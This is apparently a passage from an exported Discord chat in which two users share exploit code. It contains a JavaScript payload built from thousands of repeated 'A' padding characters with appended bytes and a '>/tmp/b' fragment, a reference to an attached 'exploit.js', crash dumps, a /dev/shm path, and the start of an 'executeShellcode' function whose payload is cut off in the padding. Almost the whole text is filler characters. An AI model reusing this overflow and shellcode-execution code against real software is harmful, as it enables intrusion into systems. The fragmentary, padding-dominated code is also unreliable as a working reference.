AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
> " >/tmp/b" + String.fromCharCode(0x70) + String.fromCharCode(0x5F) + String.fromCharCode(0x01)
> )
> ```
> @Emily | Sunpy#5213
> File: `exploit.js` (1.72 KB)
> this is the general idea
> but I wouldn't run this whole thing at first
> if/when you wanna mess with this mention me and I'll jump into voice
> @Jan4V#0289
> ``/dev/shm/shm_tmp/fusion.0.1``
> @Jan4V#0289
> File: `crashdump` (6.03 MB)
> @Emily | Sunpy#5213
> File: `crashdump` (181.60 KB)
> @Emily | Sunpy#5213
> ```js
> function executeShellcode(shellcode) {
>     var payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA